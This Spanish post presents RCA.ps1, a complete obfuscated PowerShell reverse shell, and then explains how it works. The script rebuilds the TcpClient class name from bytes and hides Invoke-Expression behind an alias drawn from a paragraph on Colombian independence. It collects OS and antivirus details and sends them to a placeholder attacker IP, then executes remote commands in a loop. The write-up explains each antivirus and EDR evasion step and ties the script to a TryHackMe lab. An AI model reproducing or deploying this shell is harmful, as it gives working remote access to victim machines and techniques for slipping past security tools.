RCA.ps1

Reverse Shell Ofuscada en PowerShell

# Funcion encargada de convertir un arreglo de bytes y lo convierte en una cadena utilizando la codificacion especificada, como UTF-8
function ConvertFrom-ByteArray {

    Param (
        [Parameter(Position = 0, ValueFromPipeline = $True)]
        [Byte[]]
        $ByteArray,

        [Parameter(Position = 1)]
        [ValidateSet('ASCII', 'UTF8', 'UTF16', 'UTF32')]
        [String]
        $Encoding = 'UTF8'
    )

    if (!$ByteArray) {
        return ''
    }

    [Text.Encoding]::GetEncoding($($Encoding -replace 'UTF','UTF-')).GetString($ByteArray)
}
# final de Funcion ConvertFrom-ByteArray


while ($true) {
    # Generando valores aleatorios y codificando en Base64
    $Base64 = [Convert]::ToBase64String((1..32 | %{[byte](Get-Random -Minimum 0 -Maximum 255)}));
    $Key = ([Convert]::FromBase64String($Base64));

    # Recopilacion de informacion del equipo victima
    $System = (Get-WmiObject Win32_OperatingSystem).Caption;
    $Version = (Get-WmiObject Win32_OperatingSystem).Version;
    $Architecture = (Get-WmiObject Win32_OperatingSystem).OSArchitecture;
    $WindowsDirectory = (Get-WmiObject Win32_OperatingSystem).WindowsDirectory;
    $av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;
    # Configuracion de la IPAddress
    $p = "Tu-IP"

    # Concatenacion de variables de informacion el equipo con su respectiva clave:valor
    $w = "=> RECOPILACION DE INFORMACION DEL TARGET <= `r`n System: $System`r`n VERSION: $Version`r`n ARCH: $Architecture`r`n DIRECTORY: $WindowsDirectory`r`n AVS: $av`r`n GET /index.html HTTP/1.1`r`nHost: $p`r`nMozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0`r`nAccept: text/html`r`n`r`n"
    
    $s = [System.Text.ASCIIEncoding]
    [byte[]]$b = 0..65535|%{0};
    $LUNA = ConvertFrom-ByteArray  @(83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,46,84,67,80,67,108,105,101,110,116)
    $r = "LaindependenciadeColombiaocurrienelsigloXIXcuandolascoloniasamericanaslucharoncontraelyugoespaol.LideradosporfigurascomoSimnBolvaryFranciscodePaulaSantanderlosrebeldeslograronliberaraColombiadeladominacincolonial.LaguerraferozylargaculminconlaBatalladeBoyacen1819unhitoquesellaemancipacincolombiana.EstaluchaarduamarcelnacimientodeunanacinlibreysoberanaenAmricadelSur."
    Set-Alias $r ($r[$true-11] + ($r[[byte]("0x" + "FF") -261]) + $r[[byte]("0x" + "2a") -2])
    
    # Configuracion de Puerto
    $y = New-Object $LUNA($p,Tu-Puerto)
    $z = $y.GetStream()
    $d = $s::UTF8.GetBytes($w)
    $z.Write($d, 0, $d.Length)
    $SPARTAN = "whoami"
    $t = (LaindependenciadeColombiaocurrienelsigloXIXcuandolascoloniasamericanaslucharoncontraelyugoespaol.LideradosporfigurascomoSimnBolvaryFranciscodePaulaSantanderlosrebeldeslograronliberaraColombiadeladominacincolonial.LaguerraferozylargaculminconlaBatalladeBoyacen1819unhitoquesellaemancipacincolombiana.EstaluchaarduamarcelnacimientodeunanacinlibreysoberanaenAmricadelSur. $SPARTAN) + "@c2===> "

    while(($l = $z.Read($b, 0, $b.Length)) -ne 0){
        $v = (New-Object -TypeName $s).GetString($b,0, $l)
        $d = $s::UTF8.GetBytes((LaindependenciadeColombiaocurrienelsigloXIXcuandolascoloniasamericanaslucharoncontraelyugoespaol.LideradosporfigurascomoSimnBolvaryFranciscodePaulaSantanderlosrebeldeslograronliberaraColombiadeladominacincolonial.LaguerraferozylargaculminconlaBatalladeBoyacen1819unhitoquesellaemancipacincolombiana.EstaluchaarduamarcelnacimientodeunanacinlibreysoberanaenAmricadelSur.  $v 2>&1 | Out-String )) + $s::UTF8.GetBytes($t)
        $z.Write($d, 0, $d.Length)
    }
    $y.Close()
    Start-Sleep -Seconds 7
}

Análisis del payload:

El código analizado es una Reverse Shell TCP escrita en PowerShell, diseñada específicamente con técnicas de ofuscación para evadir la detección de antivirus (AV) y sistemas de detección de endpoints (EDR). A diferencia de una shell simple de una línea, este script oculta sus intenciones mediante la manipulación de cadenas y alias dinámicos.

A continuación, desglosamos sus tres componentes principales:

1. Evasión de Firmas Estáticas (El método ConvertFrom-ByteArray)

Los antivirus modernos buscan cadenas de texto peligrosas conocidas (como System.Net.Sockets.TcpClient). Para evitar esto, el script nunca escribe esa clase en texto plano.

La Técnica: Define una función auxiliar ConvertFrom-ByteArray que toma una lista de números (bytes) y los reconstruye en texto.
El Resultado: La variable $LUNA se construye a partir del array (83,121,115,...). Si conviertes esos números a ASCII, obtienes la cadena "System.Net.Sockets.TcpClient". De esta forma, el script carga la clase de red .NET necesaria para la conexión sin alertar a los escáneres estáticos.

2. Recolección de Inteligencia (Reconnaissance)

Antes de establecer la conexión persistente, el script realiza un inventario rápido del sistema víctima utilizando consultas WMI (Get-WmiObject):

Objetivo: Recopila el Sistema Operativo, Versión, Arquitectura (x64/x86), Directorio de Windows y, crucialmente, intenta detectar qué Antivirus está instalado (consultando root/SecurityCenter2).
Exfiltración: Toda esta información se empaqueta en una cabecera HTTP falsa (GET /index.html...) para que el tráfico inicial parezca una navegación web legítima ante ojos de un firewall básico.

3. Ofuscación de Ejecución (El texto de la "Independencia de Colombia")

Esta es la parte más ingeniosa del script. Verás un párrafo largo y sin espacios sobre la historia de Colombia ($r). Esto no es un comentario, es una herramienta de camuflaje.

Creación de Alias: La línea Set-Alias $r (...) toma ese texto largo y lo convierte en un alias (un nombre alternativo) para un comando del sistema.
La Matemática Oculta: Mediante operaciones con índices (como $r[$true-11]), el script extrae letras específicas de ese texto para formar la palabra "iex" (abreviatura de Invoke-Expression).
Ejecución: En el bucle while, cuando el script recibe un comando tuyo ($v), no usa iex $v (lo cual sería detectado inmediatamente por el AV). En su lugar, llama a la variable larga:
PowerShell
```
(LaindependenciadeColombia... $v 2>&1 | Out-String)
```
Para PowerShell, esto significa "Ejecuta el comando contenido en $v usando el alias Laindependencia... (que en realidad es iex)".

Resumen del Flujo de Ejecución

Conexión: Se conecta a tu IP y Puerto ($LUNA($p,Tu-Puerto)).
Bucle Infinito:
- Lee los bytes que envías desde tu listener (netcat).
- Los decodifica a texto.
- Los ejecuta usando el alias ofuscado.
- Envía el resultado de vuelta por el mismo túnel TCP.

Este payload se usa en la máquina Relevant de THM